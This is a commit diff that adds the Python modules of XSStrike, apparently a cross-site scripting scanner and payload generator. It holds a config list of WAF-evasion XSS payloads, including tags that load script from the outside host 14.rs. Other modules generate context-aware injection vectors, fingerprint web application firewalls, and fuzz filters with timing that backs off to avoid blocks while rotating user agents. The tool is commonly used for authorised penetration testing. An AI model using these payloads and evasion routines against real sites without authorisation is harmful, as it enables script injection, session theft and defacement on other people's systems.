Add files via upload
This commit is contained in:
19
core/checker.py
Normal file
19
core/checker.py
Normal file
@@ -0,0 +1,19 @@
|
||||
import re
|
||||
import copy
|
||||
from fuzzywuzzy import fuzz
|
||||
from core.utils import replacer
|
||||
from core.config import xsschecker
|
||||
from urllib.parse import quote_plus
|
||||
from core.requester import requester
|
||||
|
||||
def checker(url, params, headers, GET, delay, payload):
|
||||
checkString = 'st4r7' + payload
|
||||
paramsCopy = copy.deepcopy(params)
|
||||
response = requester(url, replacer(paramsCopy, xsschecker, checkString), headers, GET, delay).text.lower()
|
||||
# Itretating over the reflections
|
||||
efficiencies = []
|
||||
for m in re.finditer('st4r7', response):
|
||||
reflected = response[m.start():m.start()+len(checkString)]
|
||||
efficiency = fuzz.partial_ratio(reflected, checkString.lower())
|
||||
efficiencies.append(efficiency)
|
||||
return efficiencies
|
||||
12
core/colors.py
Normal file
12
core/colors.py
Normal file
@@ -0,0 +1,12 @@
|
||||
white = '\033[97m'
|
||||
dgreen = '\033[32m'
|
||||
green = '\033[92m'
|
||||
red = '\033[91m'
|
||||
yellow = '\033[93m'
|
||||
end = '\033[0m'
|
||||
back = '\033[7;91m'
|
||||
info = '\033[93m[!]\033[0m'
|
||||
que = '\033[94m[?]\033[0m'
|
||||
bad = '\033[91m[-]\033[0m'
|
||||
good = '\033[92m[+]\033[0m'
|
||||
run = '\033[97m[~]\033[0m'
|
||||
67
core/config.py
Normal file
67
core/config.py
Normal file
@@ -0,0 +1,67 @@
|
||||
xsschecker = 'v3dm0s' # A non malicious string to check for reflections and stuff
|
||||
|
||||
minEfficiency = 90
|
||||
|
||||
delay = 0
|
||||
threads = 2
|
||||
timeout = 7
|
||||
|
||||
badTags = ('iframe', 'title', 'textarea', 'noembed', 'style', 'template', 'noscript')
|
||||
|
||||
tags = ('html', 'd3v', 'a', 'details') # HTML Tags
|
||||
|
||||
jFillings = ('-', '*', ';', '/')
|
||||
lFillings = ('', ' x')
|
||||
eFillings = ('%09', '%0a', '%0d', '+') # "Things" to use between event handler and = or between function and =
|
||||
fillings = ('%09', '%0a', '%0d', '/+/') # "Things" to use instead of space
|
||||
|
||||
eventHandlers = { # Event handlers and the tags compatible with them
|
||||
'ontoggle': ['details'],
|
||||
'onpointerenter': ['d3v', 'details', 'html', 'a'],
|
||||
'onmouseover': ['a', 'html', 'd3v']
|
||||
}
|
||||
|
||||
functions = ( # JavaScript functions to get a popup
|
||||
'[8].find(confirm)', 'confirm()',
|
||||
'(confirm)()', 'co\u006efir\u006d()',
|
||||
'(prompt)``', 'a=prompt,a()')
|
||||
|
||||
payloads = ( # Payloads for filter & WAF evasion
|
||||
'\'"</Script><Html Onmouseover=(confirm)()//'
|
||||
'<imG/sRc=l oNerrOr=(prompt)() x>',
|
||||
'<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>',
|
||||
'<deTails open oNToggle=confi\u0072m()>',
|
||||
'<img sRc=l oNerrOr=(confirm)() x>',
|
||||
'<svg/x=">"/onload=confirm()//',
|
||||
'<svg%0Aonload=%09((pro\u006dpt))()//',
|
||||
'<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>',
|
||||
'<sCript x>confirm``</scRipt x>',
|
||||
'<Script x>prompt()</scRiPt x>',
|
||||
'<sCriPt sRc=//14.rs>',
|
||||
'<embed//sRc=//14.rs>',
|
||||
'<base href=//14.rs/><script src=/>',
|
||||
'<object//data=//14.rs>',
|
||||
'<s=" onclick=confirm``>clickme',
|
||||
'<svG oNLoad=co\u006efirm(1)>',
|
||||
'\'"><y///oNMousEDown=((confirm))()>Click',
|
||||
'<a/href=javascript:co\u006efirm("1")>clickme</a>',
|
||||
'<img src=x onerror=confir\u006d`1`>',
|
||||
'<svg/onload=co\u006efir\u006d`1`>')
|
||||
|
||||
fuzzes = ( # Fuzz strings to test WAFs
|
||||
'<test', '<test//', '<test>', '<test x>', '<test x=y', '<test x=y//',
|
||||
'<test/oNxX=yYy//', '<test oNxX=yYy>', '<test onload=x', '<test/o%00nload=x',
|
||||
'<test sRc=xxx', '<test data=asa', '<test data=javascript:asa', '<svg x=y>',
|
||||
'<details x=y//', '<a href=x//', '<emBed x=y>', '<object x=y//', '<bGsOund sRc=x>',
|
||||
'<iSinDEx x=y//', '<aUdio x=y>', '<script x=y>', '<script//src=//', '">payload<br/attr="',
|
||||
'"-confirm``-"', '<test ONdBlcLicK=x>', '<test/oNcoNTeXtMenU=x>', '<test OndRAgOvEr=x>')
|
||||
|
||||
headers = {
|
||||
'User-Agent' : '$',
|
||||
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Accept-Language' : 'en-US,en;q=0.5',
|
||||
'Accept-Encoding' : 'gzip,deflate',
|
||||
'Connection' : 'close',
|
||||
'DNT' : '1',
|
||||
'Upgrade-Insecure-Requests' : '1',
|
||||
}
|
||||
30
core/dom.py
Normal file
30
core/dom.py
Normal file
@@ -0,0 +1,30 @@
|
||||
import re
|
||||
from core.colors import red, end, yellow
|
||||
|
||||
def dom(response):
|
||||
result = False
|
||||
highlighted = []
|
||||
response = response.split('\n')
|
||||
SOURCES_RE = r"""location\.|\.([.\[]\s*["']?\s*arguments|dialogArguments|innerHTML|write|open|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\b|(localStorage|sessionStorage|Database)\b"""
|
||||
SINKS_RE = r"""( (src|href|data|location|code|value|action)=)|(replace|assign|navigate|getResponseHeader|open|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\("""
|
||||
num = 1
|
||||
for newLine in response:
|
||||
line = newLine
|
||||
pattern = re.findall(SOURCES_RE, line)
|
||||
for grp in pattern:
|
||||
source = ''.join(grp)
|
||||
line = line.replace(source, yellow + source + end)
|
||||
pattern = re.findall(SINKS_RE, line)
|
||||
for grp in pattern:
|
||||
sink = ''.join(grp)
|
||||
line = line.replace(sink, red + sink + end)
|
||||
if line != newLine:
|
||||
highlighted.append('%-3s %s' % (str(num), line.lstrip(' ')))
|
||||
num += 1
|
||||
if highlighted:
|
||||
print (red + ('-' * 60) + end)
|
||||
result = True
|
||||
for line in highlighted:
|
||||
print (line)
|
||||
print (red + ('-' * 60) + end)
|
||||
return result
|
||||
30
core/filterChecker.py
Normal file
30
core/filterChecker.py
Normal file
@@ -0,0 +1,30 @@
|
||||
from core.utils import replacer
|
||||
from core.checker import checker
|
||||
from core.config import xsschecker
|
||||
from core.requester import requester
|
||||
|
||||
def filterChecker(url, params, headers, GET, delay, occurences):
|
||||
environments = set(['<', '>'])
|
||||
sortedEfficiencies = {}
|
||||
for i in range(len(occurences.values())):
|
||||
sortedEfficiencies[i] = {}
|
||||
for occurence in occurences.values():
|
||||
environments.add(occurence['context'][1])
|
||||
location = occurence['context'][0]
|
||||
if location == 'comment':
|
||||
environments.add('-->')
|
||||
elif location == 'script':
|
||||
environments.add('</scRipT/>')
|
||||
for environment in environments:
|
||||
if environment == '':
|
||||
efficiencies = [100 for i in range(len(occurences))]
|
||||
else:
|
||||
efficiencies = checker(url, params, headers, GET, delay, environment)
|
||||
if not efficiencies:
|
||||
for i in range(len(occurences)):
|
||||
efficiencies.append(0)
|
||||
for i, efficiency in zip(range(len(efficiencies)), efficiencies):
|
||||
sortedEfficiencies[i][environment] = efficiency
|
||||
for efficiency, occurence in zip(sortedEfficiencies.values(), occurences.values()):
|
||||
occurence['score'] = efficiency
|
||||
return occurences
|
||||
@@ -1,52 +1,38 @@
|
||||
import sys
|
||||
import requests
|
||||
from prettytable import PrettyTable # Module for print table of results
|
||||
from urllib.parse import quote_plus
|
||||
from core.make_request import make_request
|
||||
import copy
|
||||
from time import sleep
|
||||
from random import randint
|
||||
from core.utils import replacer
|
||||
from urllib.parse import quote_plus
|
||||
from core.requester import requester
|
||||
from core.config import fuzzes, xsschecker
|
||||
from core.colors import end, red, white, green, yellow, run, bad, good, info, que
|
||||
|
||||
green = '\033[92m'
|
||||
red = '\033[91m'
|
||||
yellow = '\033[93m'
|
||||
end = '\033[0m'
|
||||
info = '\033[93m[!]\033[0m'
|
||||
bad = '\033[91m[-]\033[0m'
|
||||
run = '\033[97m[~]\033[0m'
|
||||
def counter(string):
|
||||
special = '\'"=/:*&)(}{][><'
|
||||
count = 0
|
||||
for char in list(string):
|
||||
if char in special:
|
||||
count += 1
|
||||
return count
|
||||
|
||||
# "Not so malicious" payloads for fuzzing
|
||||
fuzzes = ['<test', '<test//', '<test>', '<test x>', '<test x=y', '<test x=y//',
|
||||
'<test/oNxX=yYy//', '<test oNxX=yYy>', '<test onload=x', '<test/o%00nload=x',
|
||||
'<test sRc=xxx', '<test data=asa', '<test data=javascript:asa', '<svg x=y>',
|
||||
'<details x=y//', '<a href=x//', '<emBed x=y>', '<object x=y//', '<bGsOund sRc=x>',
|
||||
'<iSinDEx x=y//', '<aUdio x=y>', '<script x=y>', '<script//src=//', '">payload<br/attr="',
|
||||
'"-confirm``-"', '<test ONdBlcLicK=x>', '<test/oNcoNTeXtMenU=x>', '<test OndRAgOvEr=x>']
|
||||
|
||||
def fuzzer(url, param_data, method, delay, xsschecker, cookie):
|
||||
result = [] # Result of fuzzing
|
||||
progress = 0 # Variable for recording the progress of fuzzing
|
||||
for i in fuzzes:
|
||||
progress = progress + 1
|
||||
sleep(delay) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec. # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
|
||||
sys.stdout.write('\r%s Fuzz Sent: %i/%i' % (run, progress, len(fuzzes)))
|
||||
sys.stdout.flush()
|
||||
fuzzy = quote_plus(i) # URL encoding the payload
|
||||
param_data_injected = param_data.replace(xsschecker, fuzzy) # Replcaing the xsschecker with fuzz
|
||||
def fuzzer(url, params, headers, GET, delay, WAF):
|
||||
for fuzz in fuzzes:
|
||||
if delay == 0:
|
||||
delay = 6
|
||||
t = delay + randint(delay, delay * 2) + counter(fuzz)
|
||||
sleep(t)
|
||||
paramsCopy = copy.deepcopy(params)
|
||||
try:
|
||||
if method == 'GET': # GET parameter
|
||||
r = requests.get(url + param_data_injected, timeout=10, cookies=cookie) # makes a request to example.search.php?q=<fuzz>
|
||||
else: # POST parameter
|
||||
r = requests.post(url, data=param_data_injected, timeout=10, cookies=cookie) # Seperating "param_data_injected" with comma because its POST data
|
||||
response = r.text
|
||||
response = requester(url, replacer(paramsCopy, xsschecker, fuzz), headers, GET, delay/2)
|
||||
except:
|
||||
print ('\n%s WAF is dropping suspicious requests.' % bad)
|
||||
if delay == 0:
|
||||
print ('%s Delay has been increased to %s6%s seconds.' % (info, green, end))
|
||||
delay += 6
|
||||
limit = (delay + 1) * 2
|
||||
limit = (delay + 1) * 50
|
||||
timer = -1
|
||||
while timer < limit:
|
||||
sys.stdout.write('\r%s Fuzzing will continue after %s%i%s seconds.' % (info, green, limit, end))
|
||||
sys.stdout.flush()
|
||||
print ('\r%s Fuzzing will continue after %s%i%s seconds.\t\t' % (info, green, limit, end), end='\r')
|
||||
limit -= 1
|
||||
sleep(1)
|
||||
try:
|
||||
@@ -55,20 +41,10 @@ def fuzzer(url, param_data, method, delay, xsschecker, cookie):
|
||||
except:
|
||||
print ('\n%s Looks like WAF has blocked our IP Address. Sorry!' % bad)
|
||||
break
|
||||
if i in response: # if fuzz string is reflected in the response / source code
|
||||
result.append({
|
||||
'result' : '%sWorks%s' % (green, end),
|
||||
'fuzz' : i})
|
||||
elif str(r.status_code)[:1] != '2': # if the server returned an error (Maybe WAF blocked it)
|
||||
result.append({
|
||||
'result' : '%sBlocked%s' % (red, end),
|
||||
'fuzz' : i})
|
||||
if fuzz.lower() in response.text.lower(): # if fuzz string is reflected in the response
|
||||
result = ('%s[passed] %s' % (green, end))
|
||||
elif str(response.status_code)[:1] != '2': # if the server returned an error (Maybe WAF blocked it)
|
||||
result = ('%s[blocked] %s' % (red, end))
|
||||
else: # if the fuzz string was not reflected in the response completely
|
||||
result.append({
|
||||
'result' : '%sFiltered%s' % (yellow, end),
|
||||
'fuzz' : i})
|
||||
table = PrettyTable(['Fuzz', 'Response']) # Creates a table with two columns
|
||||
for value in result:
|
||||
table.add_row([value['fuzz'], value['result']]) # Adds the value of fuzz and result to the columns
|
||||
print('\n', table)
|
||||
quit()
|
||||
result = ('%s[filtered]%s' % (yellow, end))
|
||||
print ('%s %s' % (result, fuzz))
|
||||
98
core/generator.py
Normal file
98
core/generator.py
Normal file
@@ -0,0 +1,98 @@
|
||||
from core.jsContexter import jsContexter
|
||||
from core.utils import randomUpper as r, genGen, extractScripts
|
||||
from core.config import badTags, fillings, eFillings, lFillings, jFillings, eventHandlers, tags, functions
|
||||
|
||||
def generator(occurences, response):
|
||||
scripts = extractScripts(response)
|
||||
index = 0
|
||||
vectors = {10 : set(), 9 : set(), 8 : set(), 7 : set(), 6 : set(), 5 : set(), 4 : set(), 3 : set(), 2 : set(), 1 : set()}
|
||||
for i in occurences:
|
||||
context = occurences[i]['context'][0]
|
||||
breaker = occurences[i]['context'][1]
|
||||
special = occurences[i]['context'][2]
|
||||
if special not in badTags:
|
||||
special = ''
|
||||
elif context == 'attribute':
|
||||
special = '</' + special + '/>'
|
||||
else:
|
||||
special = ''
|
||||
attribute = occurences[i]['context'][3]
|
||||
if context == 'html':
|
||||
lessBracketEfficiency = occurences[i]['score']['<']
|
||||
greatBracketEfficiency = occurences[i]['score']['>']
|
||||
breakerEfficiency = occurences[i]['score'][breaker]
|
||||
ends = ['//']
|
||||
if greatBracketEfficiency == 100:
|
||||
ends.append('>')
|
||||
if lessBracketEfficiency == breakerEfficiency == 100:
|
||||
payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special)
|
||||
for payload in payloads:
|
||||
vectors[10].add(payload)
|
||||
elif context == 'attribute':
|
||||
breakerEfficiency = occurences[i]['score'][breaker]
|
||||
greatBracketEfficiency = occurences[i]['score']['>']
|
||||
ends = ['//']
|
||||
if greatBracketEfficiency == 100:
|
||||
ends.append('>')
|
||||
if greatBracketEfficiency == 100 and breakerEfficiency == 100:
|
||||
payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special)
|
||||
for payload in payloads:
|
||||
if breaker:
|
||||
payload = payload.replace(breaker, breaker + '>')
|
||||
else:
|
||||
payload = '>' + payload
|
||||
vectors[10].add(payload)
|
||||
if breakerEfficiency == 100:
|
||||
for filling in fillings:
|
||||
for function in functions:
|
||||
vector = breaker + filling + 'auTOfOcuS' + filling + 'OnFoCUs' + '=' + breaker + function
|
||||
vectors[6].add(vector)
|
||||
elif context == 'comment':
|
||||
lessBracketEfficiency = occurences[i]['score']['<']
|
||||
greatBracketEfficiency = occurences[i]['score']['>']
|
||||
breakerEfficiency = occurences[i]['score'][breaker]
|
||||
ends = ['//']
|
||||
if greatBracketEfficiency == 100:
|
||||
ends.append('>')
|
||||
if lessBracketEfficiency == breakerEfficiency == 100:
|
||||
payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special)
|
||||
for payload in payloads:
|
||||
vectors[10].add(payload)
|
||||
elif context == 'script':
|
||||
try:
|
||||
script = scripts[index]
|
||||
except IndexError:
|
||||
script = scripts[0]
|
||||
closer = jsContexter(script)
|
||||
validBreakers = ['\'', '"', '`']
|
||||
scriptEfficiency = occurences[i]['score']['</scRipT/>']
|
||||
greatBracketEfficiency = occurences[i]['score']['>']
|
||||
breakerEfficiency = occurences[i]['score'][breaker]
|
||||
ends = ['//']
|
||||
if greatBracketEfficiency == 100:
|
||||
ends.append('>')
|
||||
if scriptEfficiency == 100:
|
||||
breaker = r('</script/>')
|
||||
payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special)
|
||||
for payload in payloads:
|
||||
vectors[10].add(payload)
|
||||
if closer:
|
||||
suffix = '//\\'
|
||||
if not breaker:
|
||||
closer = closer[1:]
|
||||
for filling in jFillings:
|
||||
for function in functions:
|
||||
vector = closer + filling + function + suffix
|
||||
vectors[7].add(vector)
|
||||
elif breakerEfficiency >= 83:
|
||||
suffix = '//'
|
||||
for filling in jFillings:
|
||||
for function in functions:
|
||||
if '=' in function:
|
||||
function = '(' + function + ')'
|
||||
if breaker == '':
|
||||
filling = ''
|
||||
vector = '\\' + breaker + closer + filling + function + suffix
|
||||
vectors[6].add(vector)
|
||||
index += 1
|
||||
return vectors
|
||||
65
core/htmlParser.py
Normal file
65
core/htmlParser.py
Normal file
@@ -0,0 +1,65 @@
|
||||
import re
|
||||
from core.config import badTags
|
||||
from core.config import xsschecker
|
||||
|
||||
def htmlParser(response):
|
||||
tags = [] # tags in which the input is reflected
|
||||
locations = [] # contexts in which the input is reflected
|
||||
attributes = [] # attribute names
|
||||
environments = [] # strings needed to break out of the context
|
||||
parts = response.split(xsschecker)
|
||||
parts.remove(parts[0]) # remove first element since it doesn't contain xsschecker
|
||||
parts = [xsschecker + s for s in parts] # add xsschecker in front of all elements
|
||||
for part in parts: # iterate over the parts
|
||||
deep = part.split('>')
|
||||
if '</script' in deep[0]:
|
||||
location = 'script'
|
||||
elif '</' in deep[0]:
|
||||
location = 'html'
|
||||
elif deep[0][-2:] == '--':
|
||||
location = 'comment'
|
||||
else:
|
||||
location = 'script'
|
||||
for char in part:
|
||||
if char == '<':
|
||||
location = 'attribute'
|
||||
break
|
||||
locations.append(location) # add location to locations list
|
||||
num = 0 # dummy value to keep record of occurence being processed
|
||||
for occ in re.finditer(xsschecker, response, re.IGNORECASE): # find xsschecker in response and return matches
|
||||
toLook = list(response[occ.end():]) # convert "xsschecker to EOF" into a list
|
||||
for loc in range(len(toLook)): # interate over the chars
|
||||
if toLook[loc] in ('\'', '"', '`'): # if the char is a quote
|
||||
environments.append(toLook[loc]) # add it to enviornemts list
|
||||
tokens = response.split('<')
|
||||
goodTokens = [] # tokens which contain xsschecker
|
||||
for token in tokens: # iterate over tokens
|
||||
if xsschecker in token: # if xsschecker is in token
|
||||
goodTokens.append(token) # add it to goodTokens list
|
||||
attrs = token.split(' ')
|
||||
for attr in attrs:
|
||||
if xsschecker in attr:
|
||||
attributes.append(attr.split('=')[0])
|
||||
break
|
||||
tag = re.search(r'\w+', goodTokens[num]).group() # finds the tag "inside" which input is refelcted
|
||||
tags.append(tag) # add the tag to the tags
|
||||
break
|
||||
elif toLook[loc] == '<':
|
||||
if toLook[loc + 1] == '/':
|
||||
tag = ''.join(toLook).split('</')[1].split('>')[0]
|
||||
if tag in badTags:
|
||||
environments.append('</' + tag + '/>')
|
||||
else:
|
||||
environments.append('')
|
||||
tags.append(tag)
|
||||
attributes.append('')
|
||||
break
|
||||
loc += 1
|
||||
num += 1
|
||||
occurences = {}
|
||||
for i, loc, env, tag, attr in zip(range(len(locations)), locations, environments, tags, attributes):
|
||||
occurences[i] = {}
|
||||
if loc == 'comment':
|
||||
value = '-->'
|
||||
occurences[i]['context'] = [loc, env, tag, attr]
|
||||
return occurences
|
||||
21
core/jsContexter.py
Normal file
21
core/jsContexter.py
Normal file
@@ -0,0 +1,21 @@
|
||||
import re
|
||||
from core.config import xsschecker
|
||||
|
||||
def jsContexter(script):
|
||||
broken = script.split(xsschecker)
|
||||
pre = broken[0]
|
||||
pre = re.sub(r'(?s)\{.*?\}|(?s)\(.*?\)|(?s)".*?"|(?s)\'.*?\'', '', pre)
|
||||
breaker = []
|
||||
num = 0
|
||||
for char in pre:
|
||||
if char == '{':
|
||||
breaker.append('}')
|
||||
elif char == '(':
|
||||
breaker.append(');')
|
||||
elif char == '[':
|
||||
breaker.append(']')
|
||||
elif char == '/':
|
||||
if pre[num + 1] == '*':
|
||||
breaker.append('*/')
|
||||
num += 1
|
||||
return ''.join(breaker[::-1])
|
||||
18
core/requester.py
Normal file
18
core/requester.py
Normal file
@@ -0,0 +1,18 @@
|
||||
import time
|
||||
import random
|
||||
import warnings
|
||||
import requests
|
||||
|
||||
warnings.filterwarnings('ignore') # Disable SSL related warnings
|
||||
|
||||
def requester(url, data, headers, GET, delay):
|
||||
time.sleep(delay)
|
||||
user_agents = ['Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0',
|
||||
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'
|
||||
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991']
|
||||
headers['User-Agent'] = random.choice(user_agents)
|
||||
if GET:
|
||||
response = requests.get(url, params=data, headers=headers, verify=False)
|
||||
else:
|
||||
response = requests.post(url, data=data, headers=headers, verify=False)
|
||||
return response
|
||||
30
core/updater.py
Normal file
30
core/updater.py
Normal file
@@ -0,0 +1,30 @@
|
||||
import re
|
||||
import os
|
||||
from requests import get
|
||||
from core.colors import run, que, good, info, red, end, green
|
||||
|
||||
def updater():
|
||||
print('%s Checking for updates' % run)
|
||||
changes = '''''' # Changes must be seperated by ;
|
||||
latestCommit = get('https://raw.githubusercontent.com/s0md3v/XSStrike/master/xsstrike').text
|
||||
|
||||
if changes not in latestCommit: # just a hack to see if a new version is available
|
||||
changelog = re.search(r"changes = '''(.*?)'''", latestCommit)
|
||||
changelog = changelog.group(1).split(';') # splitting the changes to form a list
|
||||
print('%s A new version of XSStrike is available.' % good)
|
||||
print('%s Changes:' % info)
|
||||
for change in changelog: # print changes
|
||||
print('%s>%s %s' % (green, end, change))
|
||||
|
||||
currentPath = os.getcwd().split('/') # if you know it, you know it
|
||||
folder = currentPath[-1] # current directory name
|
||||
path = '/'.join(currentPath) # current directory path
|
||||
choice = input('%s Would you like to update? [Y/n] ' % que).lower()
|
||||
|
||||
if choice != 'n':
|
||||
print('%s Updating XSStrike' % run)
|
||||
os.system('git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))
|
||||
os.system('cp -r %s/%s/* %s && rm -r %s/%s/ 2>/dev/null' % (path, folder, path, path, folder))
|
||||
print('%s Update successful!' % good)
|
||||
else:
|
||||
print('%s XSStrike is up to date!' % good)
|
||||
74
core/utils.py
Normal file
74
core/utils.py
Normal file
@@ -0,0 +1,74 @@
|
||||
import re
|
||||
import random
|
||||
from core.config import xsschecker
|
||||
|
||||
def replacer(dic, toReplace, replaceWith):
|
||||
for key in dic.keys():
|
||||
if dic[key] == toReplace:
|
||||
dic[key] = replaceWith
|
||||
return dic
|
||||
|
||||
def getUrl(url, data, GET):
|
||||
if GET:
|
||||
return url.split('?')[0]
|
||||
else:
|
||||
return url
|
||||
|
||||
def extractScripts(response):
|
||||
scripts = []
|
||||
matches = re.findall(r'(?s)<script.*?>(.*?)</script>', response.lower())
|
||||
for match in matches:
|
||||
if xsschecker in match:
|
||||
scripts.append(match)
|
||||
return scripts
|
||||
|
||||
def randomUpper(string):
|
||||
return ''.join(random.choice((x, y)) for x, y in zip(string.upper(),string.lower()))
|
||||
|
||||
def flattenParams(currentParam, params, payload):
|
||||
flatted = []
|
||||
for name, value in params.items():
|
||||
if name == currentParam:
|
||||
value = payload
|
||||
flatted.append(name + '=' + value)
|
||||
return '?' + '&'.join(flatted)
|
||||
|
||||
def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special):
|
||||
vectors = []
|
||||
r = randomUpper
|
||||
for tag in tags:
|
||||
if tag == 'd3v' or tag == 'a':
|
||||
bait = 'z'
|
||||
else:
|
||||
bait = ''
|
||||
for eventHandler in eventHandlers:
|
||||
if tag in eventHandlers[eventHandler]:
|
||||
for function in functions:
|
||||
for filling in fillings:
|
||||
for eFilling in eFillings:
|
||||
for lFilling in lFillings:
|
||||
for end in ends:
|
||||
if tag == 'd3v' or tag == 'a':
|
||||
if '>' in ends:
|
||||
end = '>'
|
||||
vector = vector = r(breaker) + special + '<' + r(tag) + filling + r(eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait
|
||||
vectors.append(vector)
|
||||
return vectors
|
||||
|
||||
def getParams(url, data, GET):
|
||||
params = {}
|
||||
if GET:
|
||||
if '=' in url:
|
||||
data = url.split('?')[1]
|
||||
if data[:1] == '?':
|
||||
data = data[1:]
|
||||
else:
|
||||
data = ''
|
||||
parts = data.split('&')
|
||||
for part in parts:
|
||||
each = part.split('=')
|
||||
try:
|
||||
params[each[0]] = each[1]
|
||||
except IndexError:
|
||||
params = None
|
||||
return params
|
||||
37
core/wafDetector.py
Normal file
37
core/wafDetector.py
Normal file
@@ -0,0 +1,37 @@
|
||||
import re
|
||||
from core.requester import requester
|
||||
|
||||
def wafDetector(url, params, headers, GET, delay):
|
||||
noise = '<script>alert(1)</script>' #a payload which is noisy enough to provoke the WAF
|
||||
params['xss'] = noise
|
||||
response = requester(url, params, headers, GET, delay) # Opens the noise injected payload
|
||||
code = str(response.status_code)
|
||||
response_headers = str(response.headers)
|
||||
response_text = response.text.lower()
|
||||
WAF_Name = ''
|
||||
if code[:1] != '2':
|
||||
if code == '406' or code == '501': # if the http response code is 406/501
|
||||
WAF_Name = 'Mod_Security'
|
||||
elif 'wordfence' in response_text:
|
||||
WAF_Name = 'Wordfence'
|
||||
elif code == '999': # if the http response code is 999
|
||||
WAF_Name = 'WebKnight'
|
||||
elif 'has disallowed characters' in response_text:
|
||||
WAF_Name = 'CodeIgniter'
|
||||
elif '<hr><center>nginx</center>' in response_text:
|
||||
WAF_Name = 'nginx'
|
||||
elif 'comodo' in response_text:
|
||||
WAF_Name = 'Comodo'
|
||||
elif 'sucuri' in response_text:
|
||||
WAF_Name = 'Sucuri'
|
||||
elif code == '419': # if the http response code is 419
|
||||
WAF_Name = 'F5 BIG IP'
|
||||
elif 'barra' in response_headers:
|
||||
WAF_Name = 'Barracuda'
|
||||
elif re.search(r'cf[-|_]ray', response_headers):
|
||||
WAF_Name = 'Cloudflare'
|
||||
elif 'AkamaiGHost' in response_headers:
|
||||
WAF_Name = 'AkamaiGhost'
|
||||
elif code == '403': # if the http response code is 403
|
||||
WAF_Name = 'Unknown'
|
||||
return WAF_Name
|
||||
166
xsstrike.py
Normal file
166
xsstrike.py
Normal file
@@ -0,0 +1,166 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
from __future__ import print_function
|
||||
|
||||
from core.colors import end, red, white, green, yellow, run, bad, good, info, que
|
||||
|
||||
# Just a fancy ass banner
|
||||
print('''%s _ _ _
|
||||
_ _ ___ ___| |_ ___|_| |_ ___
|
||||
|_'_|_ -|_ -| _| _| | '_| -_|
|
||||
|_,_|___|___|_| |_| |_|_,_|___|
|
||||
%s''' % (red, end))
|
||||
|
||||
try:
|
||||
from urllib.parse import unquote, urlparse
|
||||
except ImportError: # throws error in python2
|
||||
print ('%s XSStrike isn\'t compatible with python2.' % bad)
|
||||
quit()
|
||||
|
||||
# Let's import whatever we need
|
||||
import re
|
||||
import os
|
||||
import sys
|
||||
import copy
|
||||
import argparse
|
||||
import requests
|
||||
import webbrowser
|
||||
import concurrent.futures
|
||||
|
||||
import core.config
|
||||
from core.dom import dom
|
||||
from core.fuzzer import fuzzer
|
||||
from core.updater import updater
|
||||
from core.checker import checker
|
||||
from core.generator import generator
|
||||
from core.requester import requester
|
||||
from core.htmlParser import htmlParser
|
||||
from core.wafDetector import wafDetector
|
||||
from core.filterChecker import filterChecker
|
||||
from core.utils import getUrl, getParams, flattenParams
|
||||
from core.config import headers, xsschecker, minEfficiency
|
||||
|
||||
# Processing command line arguments
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument('-u', '--url', help='url', dest='target')
|
||||
parser.add_argument('--data', help='post data', dest='data')
|
||||
parser.add_argument('-c', '--cookie', help='cookie', dest='cookie')
|
||||
parser.add_argument('-t', '--threads', help='number of threads', dest='threads')
|
||||
parser.add_argument('--fuzzer', help='fuzzer', dest='fuzz', action='store_true')
|
||||
parser.add_argument('--update', help='update', dest='update', action='store_true')
|
||||
parser.add_argument('--timeout', help='timeout', dest='timeout', action='store_true')
|
||||
parser.add_argument('--params', help='find params', dest='find', action='store_true')
|
||||
parser.add_argument('-d', '--delay', help='delay between requests', dest='delay', type=int)
|
||||
args = parser.parse_args()
|
||||
|
||||
find = args.find
|
||||
fuzz = args.fuzz
|
||||
target = args.target
|
||||
cookie = args.cookie
|
||||
paramData = args.data
|
||||
delay = args.delay or core.config.delay
|
||||
threads = args.threads or core.config.threads
|
||||
timeout = args.timeout or core.config.timeout
|
||||
|
||||
if paramData:
|
||||
GET, POST = False, True
|
||||
else:
|
||||
GET, POST = True, False
|
||||
|
||||
if args.update: # if the user has supplied --update argument
|
||||
updater()
|
||||
quit() # quitting because files have been changed
|
||||
|
||||
if not target: # if the user hasn't supplied a url
|
||||
print('\n' + parser.format_help().lower())
|
||||
quit()
|
||||
|
||||
# If the user hasn't supplied the root url with http(s), we will handle it
|
||||
if target.startswith('http'):
|
||||
target = target
|
||||
else:
|
||||
try:
|
||||
response = requests.get('https://' + target)
|
||||
target = 'https://' + target
|
||||
except:
|
||||
target = 'http://' + target
|
||||
try:
|
||||
response = requests.get(target).text
|
||||
print ('%s Checking for DOM vulnerabilities' % run)
|
||||
if dom(response):
|
||||
print ('%s Potentially vulnerable objects found' % good)
|
||||
except Exception as e:
|
||||
print ('%s Unable to connect to the target' % bad)
|
||||
print ('%s Error: %s' % (bad, e))
|
||||
quit()
|
||||
|
||||
host = urlparse(target).netloc # Extracts host out of the url
|
||||
url = getUrl(target, paramData, GET)
|
||||
params = getParams(target, paramData, GET)
|
||||
if not params and not find:
|
||||
quit()
|
||||
WAF = wafDetector(url, {list(params.keys())[0] : xsschecker}, headers, GET, delay)
|
||||
if WAF:
|
||||
print ('%s WAF detected: %s%s%s' % (bad, green, WAF, end))
|
||||
else:
|
||||
